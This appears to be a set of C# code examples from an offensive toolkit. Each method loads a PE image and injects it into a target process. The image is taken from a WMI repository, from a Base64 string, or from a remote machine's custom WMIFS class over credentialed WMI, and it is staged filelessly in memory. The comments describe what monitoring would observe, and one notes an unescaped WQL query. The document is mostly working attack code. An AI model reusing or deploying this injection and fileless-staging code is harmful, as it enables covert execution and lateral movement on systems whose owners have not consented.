Example #1
 /// <summary>
 /// Obtains a PE image through <c>Misc.QueryWMIFS</c>, loads it with <c>PELoader</c> and, if that
 /// succeeds, passes the loader on to <c>_InjectPE</c>.
 /// </summary>
 /// <param name="processId">Forwarded unchanged to <c>_InjectPE</c>.</param>
 /// <param name="wmiClass">First argument of <c>Misc.QueryWMIFS</c>; presumably the WMI class holding the stored file (helper not visible here).</param>
 /// <param name="fileName">Second argument of <c>Misc.QueryWMIFS</c>; presumably the name the image is stored under.</param>
 /// <param name="parameters">Forwarded unchanged to <c>_InjectPE</c>.</param>
 /// <remarks>
 /// This method opens no file itself: the image comes from whatever <c>Misc.QueryWMIFS</c> returns.
 /// If that helper reads the WMI repository, as its name suggests, the activity that can be observed
 /// is the WMI query plus whatever <c>_InjectPE</c> does to the target process.
 /// The only failure this method reports is a <c>false</c> result from <c>PELoader.Execute</c>.
 /// </remarks>
 public static void InjectPEWMIFS(String processId, String wmiClass, String fileName, String parameters)
 {
     using (PELoader peLoader = new PELoader())
     {
         // The loader is constructed before the WMI lookup, as in the original evaluation order.
         var storedImage = Misc.QueryWMIFS(wmiClass, fileName);
         bool loaded = peLoader.Execute(storedImage);

         if (loaded)
         {
             _InjectPE(processId, peLoader, parameters);
         }
         else
         {
             Console.WriteLine("PELoader Failed");
         }
     }
 }
Example #2
 /// <summary>
 /// Base64-decodes <paramref name="peString"/> into a PE image, loads it with <c>PELoader</c> and,
 /// if that succeeds, passes the loader on to <c>_InjectPE</c>.
 /// </summary>
 /// <param name="processId">Forwarded unchanged to <c>_InjectPE</c>.</param>
 /// <param name="peString">Base64 text of the PE image.</param>
 /// <param name="parameters">Forwarded unchanged to <c>_InjectPE</c>.</param>
 /// <exception cref="FormatException">
 /// Thrown by <c>Convert.FromBase64String</c> when <paramref name="peString"/> is not valid Base64;
 /// this path does not print "PELoader Failed".
 /// </exception>
 /// <remarks>
 /// The image arrives as a string argument and is decoded in memory; this method reads nothing from
 /// disk, so the caller's input and the effect of <c>_InjectPE</c> on the target process are the
 /// places where it can be observed.
 /// </remarks>
 public static void InjectPEString(String processId, String peString, String parameters)
 {
     using (PELoader peLoader = new PELoader())
     {
         // Decoding happens after the loader is constructed, matching the original order.
         Byte[] decodedImage = Convert.FromBase64String(peString);

         if (peLoader.Execute(decodedImage))
         {
             _InjectPE(processId, peLoader, parameters);
             return;
         }

         Console.WriteLine("PELoader Failed");
     }
 }
Example #3
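        /// <summary>
        /// Connects to the <c>root\cimv2</c> WMI namespace on <paramref name="system"/> with explicit
        /// credentials, reads every <c>FileStore</c> chunk that the <c>WMIFS</c> class holds for
        /// <paramref name="fileName"/>, Base64-decodes the concatenated text and passes the resulting
        /// image to <c>PELoader</c> and then <c>_InjectPE</c>.
        /// </summary>
        /// <param name="processId">Forwarded unchanged to <c>_InjectPE</c>.</param>
        /// <param name="wmiClass">Not read by this method: both queries hard-code the class name <c>WMIFS</c>.</param>
        /// <param name="system">Host name placed into the <c>\\host\root\cimv2</c> scope path.</param>
        /// <param name="username">Assigned to <c>ConnectionOptions.Username</c>.</param>
        /// <param name="password">Assigned to <c>ConnectionOptions.Password</c> as a plain string.</param>
        /// <param name="fileName">Value compared with the <c>FileName</c> property in both WQL queries.</param>
        /// <param name="parameters">Forwarded unchanged to <c>_InjectPE</c>.</param>
        /// <exception cref="FormatException">
        /// Thrown by <c>Convert.FromBase64String</c> when the collected text is not valid Base64.
        /// </exception>
        /// <remarks>
        /// Exceptions raised by <c>scope.Connect()</c> or by the searchers are not caught here.
        /// What a monitor can expect from this method alone: one authenticated remote WMI connection,
        /// then one counting query and one query per chunk against a non-standard class. The image is
        /// assembled in memory and this method writes nothing to disk.
        /// </remarks>
        public static void InjectPEWMIFSRemote(String processId, String wmiClass, String system, String username, String password, String fileName, String parameters)
        {
            var options = new ConnectionOptions();

            options.Username = username;
            options.Password = password;

            var scope = new ManagementScope("\\\\" + system + "\\root\\cimv2", options);

            scope.Connect();

            // NOTE(review): fileName is concatenated into the WQL text unescaped, so a quote or
            // backslash in it changes the query. Left as-is because callers may already pass
            // pre-escaped names; confirm before adding escaping here.
            var queryIndexCount = new ObjectQuery("SELECT Index FROM WMIFS WHERE FileName = \'" + fileName + "\'");

            // The searcher and its result collection are IDisposable; release them as soon as the
            // chunk count has been read.
            Int32 indexCount;
            using (var searcherIndexCount = new ManagementObjectSearcher(scope, queryIndexCount))
            using (ManagementObjectCollection queryIndexCollection = searcherIndexCount.Get())
            {
                indexCount = queryIndexCollection.Count;
            }

            // A builder avoids re-copying the whole accumulated text on every chunk.
            var encodedText = new System.Text.StringBuilder();

            for (Int32 i = 0; i < indexCount; i++)
            {
                // Chunks are fetched one query per index, in ascending order, so they are appended
                // in the order they were stored.
                var queryFilePart = new ObjectQuery("SELECT FileStore FROM WMIFS WHERE FileName = \'" + fileName + "\' AND Index = \'" + i + "\'");

                using (var searcherFilePart = new ManagementObjectSearcher(scope, queryFilePart))
                using (ManagementObjectCollection queryCollection = searcherFilePart.Get())
                {
                    foreach (ManagementObject filePart in queryCollection)
                    {
                        using (filePart)
                        {
                            encodedText.Append(filePart["FileStore"].ToString());
                        }
                    }
                }
            }

            Byte[] peBytes = Convert.FromBase64String(encodedText.ToString());
            using (PELoader peLoader = new PELoader())
            {
                if (!peLoader.Execute(peBytes))
                {
                    Console.WriteLine("PELoader Failed");
                    return;
                }
                _InjectPE(processId, peLoader, parameters);
            }
        }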